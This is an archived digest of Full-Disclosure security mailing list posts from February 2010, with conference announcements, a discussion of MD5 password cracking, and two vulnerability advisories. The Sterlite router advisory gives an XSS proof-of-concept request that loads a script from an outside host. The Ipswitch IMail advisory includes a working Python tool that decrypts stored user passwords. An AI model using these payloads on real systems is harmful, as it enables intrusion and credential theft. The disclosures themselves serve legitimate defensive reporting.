User: [...] I was wondering what the level of security is in Wippien.  
[...]
Developer: [...] You shouldn't worry about security since we had it in  
mind when implementing Wippien. [...]
User: Thanks, [...] that puts my mind at ease.


From michal at ionic.co.uk  Thu Feb  4 16:17:36 2010
From: michal at ionic.co.uk (Michal)
Date: Thu, 04 Feb 2010 16:17:36 +0000
Subject: [Full-disclosure] win7x64 Direct General
In-Reply-To: 
References: 	<9B9E7EA67E1B1342B2D25F3FD1B3293003365298@BE35.exg3.exghost.com>	
	
Message-ID: <4B6AF320.2@ionic.co.uk>

On 04/02/2010 15:45, Thor (Hammer of God) wrote:
> What??s with everyone calling out ??son?? all of a sudden?  As a southern
> bred boy, I??m used to it, but have found most other people find it very
> condescending and disrespectful.  And Mr. Seltzer of all people should
> not be referred to as ??son?? in any case.

southern English or yank? In English it's quite a common essex/cockeny
term...not sure I've heard it much of north, however


From vvandal at well.com  Thu Feb  4 16:20:04 2010
From: vvandal at well.com (Vic Vandal)
Date: Thu, 4 Feb 2010 08:20:04 -0800 (PST)
Subject: [Full-disclosure] CarolinaCon-VI/2010 Announcement - March
	19th-21st - Raleigh NC
In-Reply-To: 
References: 
Message-ID: 

H4x0rs, InfoSec professionals, script kidz, n00bs, posers, and hot girls 
who like geek-smart guys (heh):

CarolinaCon is back for its 6th esteemed year!  For about the price of 
your average movie admission with popcorn and a drink ($20), YOU are 
invited to join us for an intimate weekend of technology-related education 
and information sharing.

This year's event will be held on the weekend of March 19th-21st, 2010 - 
at the Holiday Inn (Crabtree Valley/Glenwood Ave) in north Raleigh, NC. 
Raleigh is about 30 minutes from Durham, Chapel Hill, and Research 
Triangle Park.

This year CarolinaCon will run for 3 days!!!  Talks will run from 7pm to 
10pm on Friday, 10am to 10pm on Saturday, and 10am to 4pm on Sunday.

The currently confirmed list of exciting topics and esteemed presenters 
includes;
- We Don't Need No Stinking Badges - Shawn Merdinger
- Locks: Past, Picking, and Future - squ33k
- Cybercrime and the Law Enforcement Response - Professor Farnsworth
- You Spent All That Money and You Still Got Owned - Joe McCray
- Something Smells Phishy: The Evolution of Social Engineering - Chris 
Silvers and Dawn Perry
- It's Not A Vulnerability, It's A Feature - Deral Heiland
- The Search for the Ultimate Handcuff Key - Deviant Ollam
- OMG, The World Has Come To An End!!! - FeloniousFish
- Physical Manifestation of Software: Microcontrollers 101 - Nick Fury
- Protecting Systems through Log Management and System Integrity - David 
Burt
- Metasploit - Ryan Linn

Other presentation submissions still being sifted through and/or confirmed 
for possible spots on the agenda include;
- Defenseless Defense against Corporate Breaches
- The Art of Software Destruct
- Mitigating Attacks with Existing Network Infrastructure
- SQL Injection for n00bs
- Advanced SQL Injection
- How the Droid Was Rooted
- Smart People, Stupid Emails
- Mitigating Attacks with Existing Network Infrastructure
- Why Linux is Bad for Business
- Hacking with the iPhone
- Developing an Integrated GRC Program
- End-User Focused Pen-Testing

And other conference events currently on tap include;
- Hacker Trivia
- TOOOL Lockpicking Village
....and others to be announced!

If you plan to attend from out of town and would like to reserve a room at 
the Con hotel, call 919-782-8600 or 1-800-HOLIDAY.  Mention that you want 
to reserve your room under the group block of "CarolinaCon Technology 
Conference", to get the special rate of $69 dollars per night.

And for all the exciting details as they develop, stay tuned to:
www.carolinacon.org

Peace,
Vic


From Valdis.Kletnieks at vt.edu  Thu Feb  4 15:52:32 2010
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 04 Feb 2010 10:52:32 -0500
Subject: [Full-disclosure] anybody know good service for cracking md5?
In-Reply-To: Your message of "Wed, 03 Feb 2010 23:02:20 +0100."
	<3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com>
References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com>
	<504.1265232402@localhost>
	<3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com>
Message-ID: <6325.1265298752@localhost>

On Wed, 03 Feb 2010 23:02:20 +0100, Christian Sciberras said:

> Actually dictionary attacks seem to work quite well, especially for common
> users which typically use dictionary and/or well known passwords (such as
> the infamous "password").
> Another idea which seems to be cropping in, is the use of hash tables with a
> list of known passwords rather then dictionary approach.
> Personally, the hash table one is quite successful, consider that it targets
> password groups rather than a load of wild guesses.

Correct - the point is those are *clever* ways to break an MD5 hash of a
password, rather than a brute-force attack.  They work in several days rather
than several thousand times the age of the universe precisely because they're
clever.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/0f47d0d6/attachment.bin 

From juha-matti.laurio at netti.fi  Thu Feb  4 18:17:30 2010
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 4 Feb 2010 20:17:30 +0200 (EET)
Subject: [Full-disclosure] Fingerprinting web applications (Joomla,
 Mediawiki and Wordpress)
Message-ID: <27912666.1703331265307451083.JavaMail.juha-matti.laurio@netti.fi>

A working link (without end-tag and dot) is
http://www.mytty.org/wafp/

Juha-Matti

Henri Salo [henri at nerv.fi] kirjoitti: 
> On Fri, 29 Jan 2010 18:30:07 -0400
> dd at sucuri.net wrote:
> 
> > Hi List,
> > 
> > I just posted a document on fingerprinting web applications where I
> > show some ideas to remotely detect the version of Joomla, Mediawiki
> > and Wordpress (easily extended to other apps).
> > 
> > http://sucuri.net/?page=docs&title=fingerprinting-web-apps
> > 
> > There is also a live tool for you to test with any site:
> > http://sucuri.net/?page=docs&title=fingerprinting-web-apps#v6
> > 
> > 
> > Thanks,
> > 
> > --dd
> 
> Check .
> 
> ---
> Henri Salo



From karnganeshen at gmail.com  Thu Feb  4 19:39:58 2010
From: karnganeshen at gmail.com (Karn Ganeshen)
Date: Fri, 5 Feb 2010 01:09:58 +0530
Subject: [Full-disclosure] Sterlite SAM300AX ADSL router - Cross Site
	Scripting (XSS) / Remote Code Execution.
Message-ID: 

*Sterlite SAM300AX ADSL router* is provided through MTNL, New Delhi, India,
amongst other national / international locations
(www.sterlitetechnologies.com /
http://sterlitetechnologies.com/sterlite.aspx).

##########

*+About MTNL+*

http://mtnldelhi.in/glance/index.htm

MTNL was set up on 1st April, 1986 by the Government of India to upgrade the
quality of telecom services, expand the telecom network, introduce new
services and to raise revenue for telecom development needs of India?s key
metros ? Delhi, the political capital and Mumbai, the business capital of
India.

Govt. of India currently holds 56.25% stake in the company.

*+Broadband device used+*

http://delhi.mtnl.net.in/services/broadband.htm

Sterlite SAM300AX ADSL router is deployed by MTNL at user's end (usually
home / small office) for internet broadband services.

*+Vulnerability+*

A. Reflective Cross Site Scripting ( May also result in remote code
execution )

*+Details of Vulnerability+*

The management interface of the router is accessible through HTTP. After
logging in, we are presented with various administrative screens.

It has been found that the user input is not properly filtered and / or
encoded by the application. Hence, allowing an attacker to execute scripts
on the user's browser.

*+Pre-Requisites+*
*User logged on to the Router.*
*
+PoC+*

One of the vulnerable HTTP requests & parameters is provided below for
reference.
Go to Menu -> Statistics

*+POST Request+*

POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101

*+POST Parameters+*

Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org
%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

*+Impact+*

High Impact. This device is supplied in Delhi, and Mumbai through MTNL, a
Govt. of India controlled organization. As there is no filtering / encoding
in place, an attacker has the opportunity to get the scripts executed by the
user (logged on to the router http://192.168.1.1). XSS can be used to obtain
login credentials, download malware, execute scripts from external sources,
gain access to the system and subsequently perform further serious attacks
like DoS/DDoS.

*+Solution+*

A. Sanitize / filter all input.
B. Ensure ALL Input and Output is encoded properly.

*+References+*
-> OWASP (www.owasp.org)

##########

*Vulnerability Found:* January 19, 2010

*Vendor First Notified: January 20, 2010 *
*Vendor Response:* None

*Follow Up Notification: *January 27, 2010
*Vendor Response:* None

*Public Disclosure:* February 05, 2010

##########

Best Regards,
Karn Ganeshen
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100205/3f392dcf/attachment.html 

From security at corelan.be  Thu Feb  4 22:40:31 2010
From: security at corelan.be (Security)
Date: Thu, 4 Feb 2010 23:40:31 +0100
Subject: [Full-disclosure] CORELAN-10-009 : Ipswitch IMAIL 11.01 multiple
 vulnerabilities (reversible encryption + weak ACL)
Message-ID: 

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|

Advisory	: CORELAN-10-009
Disclosure Date	: Feb 4th, 2010

0x00 : Vulnerability Information

	[+] Product  : IMail Server
	[+] Version  : 11.01
	[+] Vendor   : Ipswitch
	[+] URL	     : http://www.ipswitch.com/
	[+] Platform : Windows
	[+] Issue fix: No
	[+] Vulnerability discovered by: sinn3r
	[+] Greetings to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me/ekse/sinn3r/Jacky/jnz;
			  and all the guys with secret identities at exploit-db.com  :-p
	[+] Special thanks to: Jason from Ipswitch

0x01 : Vendor Description of Software

	"The Award-winning IMail Server is a proven email messaging solution for small and mid-sized businesses.
	 Reliable, scalable and versatile, IMail Server is an affordable choice that meets the messaging needs
	 of small and medium sized businesses. Unlike complicated and more expensive messaging solutions, IMail
	 Server delivers a quick and easy installation. As a scalable, standards-based, email server with Webmail,
	 optional integration with Microsoft Exchange ActiveSync(r), SMTP, POP, IMAP, LDAP, and List Server, IMail
	 users can send and receive email using any standards-based client, including Microsoft Outlook(r),
	 Outlook Express(r), or Eudora(r). Or, users can access email from anywhere via IMail's customizable Web
	 messaging, available in eight languages.

	 Designed to place minimal ongoing maintenance burden on network administrators, IMail can authenticate
	 users from its own database, an active directory database, or from any ODBC-compliant data store, making
	 life easier for the busy administrator. IMail Server also delivers a quick and easy installation or upgrade
	 process."

0x02 : Vulnerability Details

	1. By default, IMail allows Internet Guest Account to have "Full Control" to the following registry key,
	   including its subkeys and values. As well as the default IMail directory:
		HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail
		C:\Program Files\Ipswitch\IMail\

	2. The IMail password decryption algorithm implemented in IMailsec.dll is also reversible.

0x03 : Vendor Communication

	1/21/2010 - IMail vendor contacted
	1/26/2010 - Got a reply from the vendor (product development manager) for more vulnerability clarification.
		    No fix yet.
	2/02/2010 - Received another reply from the vendor: Issues logged for additional research.  No plans for
		    immediate changes.  A public advisory was also suggested by the vendor as reference in their
		    tech/KB article.
	2/04/2010 - Public disclosure: Advisory created.  Vendor informed.

0x04 : Exploit/Proof-of-Concept

#!/usr/bin/python

##########################################################################
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# Tested on: Windows XP SP3 (Windows version does not matter)
# Description:
# So I reverse engineered the IMail password decryption function in
# IMailsec.dll, located at 0x00563130.
#
# In order to decrypt correctly, you must have the correct username,
# because it is used as a key.
#
# All usernames and passwords are stored in registry, which can be
# found at:
# HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\[domain name]\Users
# Every registry key under "Users" has a string value named "Password",
# in there you'll find the encrypted password.
#
# By default, Internet Guest Account is granted with "Full Control" to
# the IMail registry, and its directory.  That means if an attacker
# manages to gain code execution (ie.via a web app bug), IMail can be
# his/her next playground.  And IMail users may not be safe.
#
# Demo:
# sinn3r at bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# coded by sinn3r  -  x90.sinner{at}gmail.c0m
# [*] Password = god123
#
# Responsible Disclosure Timeline:
# 1/21/2010  -  IMail vendor contacted
# 1/26/2010  -  Got a reply from the vendor for more vulnerability
#		clarfication.  No fix yet.
# 2/02/2010  -  Received another reply from the vendor: Issues logged for
#		additional research.  No plans for immediate changes.
#		A public advisory was also suggested by the vendor as
#		reference in their tech/KB article.
# 2/04/2010  -  Public Disclosure.  Vendor informed again.
##########################################################################

import sys
import binascii

## Convert the encrypted string to integers for calculation
## Returns the integer version as a list
def convertToInt(data):
	charset = []
	for char in (data):
		tmp = char.encode("hex")
		tmp = int(tmp, 16)
		charset.append(tmp)
	return charset
	

## Decrypt the password
## Returns the decrypted version as a list
def decryptPassword(intUsername, intPassword):
	results = []
	counter = 0
	counter2 = 0
	pwdLength = len(intPassword)
	while counter 54:			#0x41
			if intUsername[counter2] < 90:		#5A
				intUsername[counter2] += 32	#0x20

		tmp -= intUsername[counter2]
		counter2 += 1

		results.append(hex(tmp)[2:])
		counter += 2
	return results

banner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
coded by sinn3r  -  x90.sinner{at}gmail{d0t}c0m"""

print banner

if len(sys.argv) == 3:
	if len(sys.argv[2]) % 2 == 0:
		username = convertToInt(sys.argv[1])
		password = convertToInt(sys.argv[2])
		decryptor = str("".join(decryptPassword(username, password)))
		print "[*] Password = %s" %binascii.unhexlify(decryptor)
	else:
		print "[*] Incorrect Encrypted password length"
else:
	print "[*] Usage: %s  " %sys.argv[0]

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: corelan-10-009 ipswitch imail.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/690f5180/attachment.txt 

From jmheralds at gmail.com  Thu Feb  4 23:36:57 2010
From: jmheralds at gmail.com (James Heralds)
Date: Thu, 4 Feb 2010 18:36:57 -0500
Subject: [Full-disclosure] Draft paper submission deadline is extended:
	ISP-10
Message-ID: <739582dd1002041536s9770680we4df4aa9b84a2173@mail.gmail.com>

Draft paper submission deadline is extended: ISP-10



The 2010 International Conference on Information Security and Privacy
(ISP-10) (website:
http://www.PromoteResearch.org)
will be held during 12-14 of July 2010 in Orlando, FL, USA.  ISP is an
important event in the areas of information security, privacy, cryptography
and related topics.



The conference will be held at the same time and location where several
other major international conferences will be taking place. The conference
will be held as part of 2010 multi-conference (MULTICONF-10). MULTICONF-10
will be held during July 12-14, 2010 in Orlando, Florida, USA. The primary
goal of MULTICONF is to promote research and developmental activities in
computer science, information technology, control engineering, and related
fields. Another goal is to promote the dissemination of research to a
multidisciplinary audience and to facilitate communication among
researchers, developers, practitioners in different fields. The following
conferences are planned to be organized as part of MULTICONF-10.



   - International Conference on Artificial Intelligence and Pattern
   Recognition (AIPR-10)
   -  International Conference on Automation, Robotics and Control Systems
   (ARCS-10) 
   - International Conference on Bioinformatics, Computational Biology,
   Genomics and Chemoinformatics (BCBGC-10)
   - International Conference on Computer Communications and Networks
   (CCN-10) 
   - International Conference on Enterprise Information Systems and Web
   Technologies (EISWT-10)
   - International Conference on High Performance Computing Systems
   (HPCS-10)
   - International Conference on Information Security and Privacy (ISP-10)
   
   - International Conference on Image and Video Processing and Computer
   Vision (IVPCV-10) 
   - International Conference on Software Engineering Theory and Practice
   (SETP-10)
   - International Conference on Theoretical and Mathematical Foundations of
   Computer Science (TMFCS-10)



We invite draft paper submissions. Please see the website
http://www.PromoteResearch.org  for more
details.



Sincerely

James Heralds

Publicity committee
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/845c265f/attachment.html 

From hfortier at recon.cx  Fri Feb  5 02:02:36 2010
From: hfortier at recon.cx (Hugo Fortier)
Date: Thu, 04 Feb 2010 21:02:36 -0500
Subject: [Full-disclosure] Recon Call for Papers - July 9-11 2010
Message-ID: <4B6B7C3C.4000809@recon.cx>

/*
Architecture: x86/Linux
Author: Recon
Published: 2010-02-04

The shell code walls the following message:
+                    +                     +         +
                               +                  +           +
        +                                             +
                                     \ /
                    +     _        - _+_ -                   ,__
      _=.    .:.         /=\       _|===|_                  ||::|
     |  |    _|.        |   |     | |   | |     __===_  -=- ||::|
     |==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
     |  |-  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
   __|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
  |  |  |   |. | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
  |:.| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
  |     |      |   |   |'           :   .   |   ;     ;    '    |
  '     :      '   :   '            .       '  .      .         :
  '     .                   R E C O N     2 0 1 0     .
  '                .                .                           '
                        .           C F P

REC0N 2010
MONTREAL
JULY 9-11               
                        
+ RECON returns for 2010
                        
   - Training sessions + conference

+ We are accepting submissions

   - Single track
   - 45-60 minute presentations, or longer, we are flexible
   - There will be time for short, informal lightning talks

+ Especially on these topics

   - Reverse engineering (Software, Protocols, Hardware, Human)
   - Exploit development and vulnerability assessment
   - Data analysis and visualization techniques
   - Crypto and anonymity
   - Physical security countermeasures
   - Anything elite

+ Please include

   - Speaker name(s) and/or handle
   - Contact information (e-mail and cell phone)
   - Brief biography
   - Any presentation Supporting materials
   - Why it is cool and/or why you want to present it

+ You want to speak!

   - Please send the above information to
     cfp2010 (at) recon.cx by 15 May, 2010

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (Darwin)

mQENBEtqMN4BCADBIBOf6mK+H2QwfQYouyR5kkk5Imr3KmKzd/eGimX9srBeCauJ
vKb6K1ENxwSna58gwdW/UZ5oNauyDuin3JLYR0mDgxUo8s7cXwf0vltcR5LWDr49
cz3DC7rY2TPLDLO6PR6lNyFbtRE+UZ/OqwWrN9yNkyLfj+L2L4MDbscHsEA+Hlur
BG/4TM5FBvz0LG1v08RMDJN88PqZdg2lgjc2LS/gkcQKNS9D90BTPIJ3sWP7EVLd
RnmZ1204SXqCZyGufn02REDA0t/M7WMBDtHFFioMQc7NTaW/i2wajJWjXG8HKjw1
kl7VSjE1zZXPC8q+FBJ638dSX0nphUjZv0xhABEBAAG0HFJlY29uIENGUCA8Y2Zw
MjAxMEByZWNvbi5jeD6JAT4EEwECACgFAktqMN4CGwMFCQDtTgAGCwkIBwMCBhUI
AgkKCwQWAgMBAh4BAheAAAoJEISWGw7Okw71C7YH/0m203QqH5BtH6vaJQ56W+yO
I90xUoHOcLC6J9kqCc5wXMD3qZqyaDY/0aSFKyu0vxF7DSzO6PnuGWv//rJx6BkF
0rY6wdEA5iPTYcHG7Aht6LLAl96u98kUSIUNJX2l7+LvwJdJYgjxw4zFHOSjcH4d
m8OXm5oNpnfpsTUSTFXEeTOnP5Uz/dodWodhlVtT73YIUEr6BWNWRVJGFg9Cnoqy
M55EL4hQqhMYJDsRyUqnWAx3CJ0xqdA4dHft1CI06y7Z6FHR+J3GyqZPijJEx4Qn
Tr0w9w9CI/YX0QJPuosUHpwWulWBQRXVydC/5zfB+y0S2GUz2b+kfa+pbbaaEaG5
AQ0ES2ow3gEIALUKxeg0fhzirgklcXYBpaktpppvfzK+FGHITvdK7zC1jRsRPUIq
F1nLhYlEp7gBO2ROMXCIyQi+G3fjTrSWaJm1bJZUl9nwWLS0gr635zjgIL9X/isG
jn6JOTlzHXfzUucnfC5M+jmmJZCQCVS0n1jpCstlu/0RMcDl/H7UPPKke+foAll/
pTqcVJzZWgVvyFRI/0SXU/63ddHb2Dn0jKJ6WLo+V8UbYJSbYF3D1Z4xUUkHf6PY
xO0UOdiFnkfvHd938X6tQveLG+lRn8K/ZXtTLuztDm04XhvURujKpHvok0O5infQ
mRTMnHfl/0adHA0oNUiMNoIuWRJwRPj/ppcAEQEAAYkBJQQYAQIADwUCS2ow3gIb
DAUJAO1OAAAKCRCElhsOzpMO9YySB/9UVPbib6WZVDYdIY8vNWp9K17S/r/haPnk
95qgxuCHU62S4LlCIdNS/AblB3v/X42cIg3bvvWuIBjR9ayww+1KBAfPOVdMRDfq
+6DSBqxN1NvbItE1S90O8vPxgEQcUC+Z/gpF8MGH4T4xcPsVI2S7qLjfZdBiGzy0
CWU8iiYPE3JE94Rootin5yJbyHlek5/BUw+3tGkkWZDUV1Ww7FPdtQQJSnHbUqP3
3mF2Ss65vxatmeIvNL3FFLeSokABKeoPZd35nJP1Snw4w4lWA93sT/a+b2GYjLtb
rapk+7sYrit92kI3uA6qwoG9vM+PzJasKHT8jIyauk6RsVAba2MG
=TGKB
-----END PGP PUBLIC KEY BLOCK-----
*/

unsigned char buf[] =
"\xb9\xab\x03\x00\x00\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
"\xe7\x14\xc3\x41\x83\xeb\xfc\xe2\xf4\x8d\x1f\x9b\xd8\xb5\x72"
"\xab\x6c\x84\x9d\x24\x29\xc8\x67\xab\x41\x8f\x3b\xa1\x28\x89"
"\x9d\x20\x13\x0f\x92\xcd\x41\xe7\x71\xa0\x29\x88\x34\xe1\x6a"
"\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xcc\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe8\x61\xc7"
"\x34\xe3\x61\xc7\x34\xe3\x61\xcc\x1e\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x3f\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xcc"
"\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xcc\x1e\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x34\xe8\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7"
"\x34\xe3\x61\xc7\x34\xe3\x61\xcc\x1e\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x1d\xc7\x3b\xc9\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7"
"\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x6a\xc7\x34\xe3\x61"
"\xc7\x4b\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xee\x61\xb8\x3f\x9c"
"\x61\xca\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe3\x61\xcb\x4b\x9c\x4b\xc7\x34\xe3\x61\xc7"
"\x34\x9c\x7c\xc9\x34\xe3\x61\xc7\x3a\xf9\x6f\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x3b\xfe\x1d\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x1e\x9b\x29\xfe\x7c\x9b\x4b\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\x9b\x68\xf9\x7b\x9b"
"\x1e\xe3\x61\xc7\x34\xe3\x3d\xc7\x34\xbf\x61\xc7\x34\xe3\x1e"
"\x9b\x3a\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xbf\x61\xc7\x34\xbf"
"\x61\xc7\x34\xe3\x61\x9b\x34\xbf\x61\xc7\x34\xbf\x61\x9b\x34"
"\xe3\x61\xc7\x34\x9c\x1e\xda\x29\xfe\x1e\xc7\x34\xee\x7c\xca"
"\x34\xbf\x3d\xdd\x2e\xbf\x4b\xc7\x34\xe3\x61\xc7\x68\xfe\x7c"
"\x9b\x34\xe3\x61\x9b\x34\xe3\x3d\xc7\x34\x9c\x1e\xc7\x34\xe3"
"\x61\x9b\x3a\xf9\x6f\x9b\x34\xe3\x61\xc8\x48\xbf\x61\x9b\x2e"
"\xed\x61\x9b\x34\xbf\x61\xc7\x34\xe3\x3d\xc7\x34\xe3\x3d\xc7"
"\x3a\xbf\x3d\xc7\x2e\xe3\x3d\x9b\x68\xf9\x7b\x9b\x1e\xe3\x61"
"\xc7\x34\xe3\x3d\xc7\x34\xbf\x6c\xc7\x34\xbf\x6f\xdd\x68\x9c"
"\x3d\xc9\x34\xf9\x1e\xb8\x34\xbf\x6f\xdd\x34\xbf\x6c\xca\x68"
"\xfe\x7c\x9b\x34\xbf\x61\xc7\x3a\xbf\x61\x9b\x4b\xe3\x61\xc7"
"\x68\xe3\x66\xc7\x68\xed\x61\x9b\x68\xed\x61\xc7\x68\xbf\x3d"
"\xdd\x3a\xbf\x4b\xc7\x34\xe3\x1e\xb8\x68\xed\x61\x9b\x34\xbf"
"\x1e\x9b\x3a\xe3\x3d\xc7\x68\xed\x3d\xc9\x3a\xed\x3d\x9b\x39"
"\xee\x6c\x9b\x34\xe3\x3d\xda\x29\xbf\x61\x9b\x34\xe3\x61\x9b"
"\x34\xbf\x61\x9b\x4b\xee\x6c\xc9\x34\xe3\x61\xc7\x34\xbf\x3d"
"\xc7\x34\xe3\x3d\x9b\x68\xed\x61\x9b\x1e\xe3\x61\x9b\x34\xe3"
"\x3d\xc7\x34\xbf\x61\xc7\x34\xbf\x6f\xc7\x68\xe3\x3d\xc7\x68"
"\xf9\x7b\xc9\x68\xbf\x7b\xc7\x3a\xbf\x61\xc7\x68\xfe\x7c\x9b"
"\x34\xbf\x61\xc9\x34\xf9\x61\x9b\x29\xbf\x7c\xda\x29\xbf\x61"
"\xc7\x34\xe3\x7b\x9b\x68\xe3\x6f\xc7\x68\xbf\x3d\xc7\x3a\xbf"
"\x4b\xc7\x34\xbf\x7b\xc9\x68\xe3\x6f\x9b\x34\xe3\x61\x9b\x34"
"\xe3\x3d\xc7\x68\xe3\x3d\xdd\x3a\xf9\x3d\x9b\x34\xed\x61\x9b"
"\x34\xe3\x3d\xda\x29\xbf\x61\x9b\x34\xe3\x61\xc7\x34\xbf\x7c"
"\x9b\x29\xfe\x7c\x9b\x34\xed\x61\xc7\x34\xbf\x66\xc7\x34\xe3"
"\x3d\xc7\x68\xe3\x61\x9b\x1e\xe3\x61\x9b\x34\xe3\x61\xc7\x34"
"\xbf\x61\xc7\x34\xe3\x61\xc7\x68\xe3\x61\xc7\x68\xe3\x61\xc7"
"\x68\xe4\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xf9\x61"
"\xc7\x34\xed\x61\xc7\x34\xbf\x61\xc7\x34\xf8\x61\xc7\x34\xe3"
"\x61\xdc\x34\xe3\x61\xc7\x33\xe3\x61\xc7\x34\xbf\x4b\xc7\x34"
"\xe4\x61\xc7\x34\xe3\x61\xdd\x34\xe3\x61\xc7\x34\xe3\x66\xc7"
"\x34\xe3\x7b\xc7\x34\xe3\x66\xc7\x34\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc9\x34\xe3\x61\xc7\x34\xe3\x61\xc0\x34\xe3"
"\x6f\xc7\x34\xe3\x61\xc7\x34\xed\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xdd\x1e\xe3\x61\xc0\x34\xe3\x61\xc7\x34\xed\x61\xc7"
"\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\x91\x61\xa2\x34\x80\x61\xa8\x34\x8d\x61\xc7\x34\xe3"
"\x61\xd5\x34\xf3\x61\xd6\x34\xf3\x61\xc7\x34\xe3\x61\xc9\x1e"
"\xe3\x61\xc0\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7"
"\x34\xe3\x61\xc7\x3a\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x34\xed\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34"
"\xe3\x61\xc7\x34\xe4\x4b\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7"
"\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61"
"\xc9\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xa4\x34\x85"
"\x61\xb7\x1e\xc9\x13\xa2\x57\xf3\x0f\xc7\x26\xf3\x70\xd7\x1e"
"\x8e\x0e\xa9\x40\x91\x04\xa6\x58\xc9\x0b\xb2\x58\x9a\x61\xde"
"\x39\xf2\x70\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61"
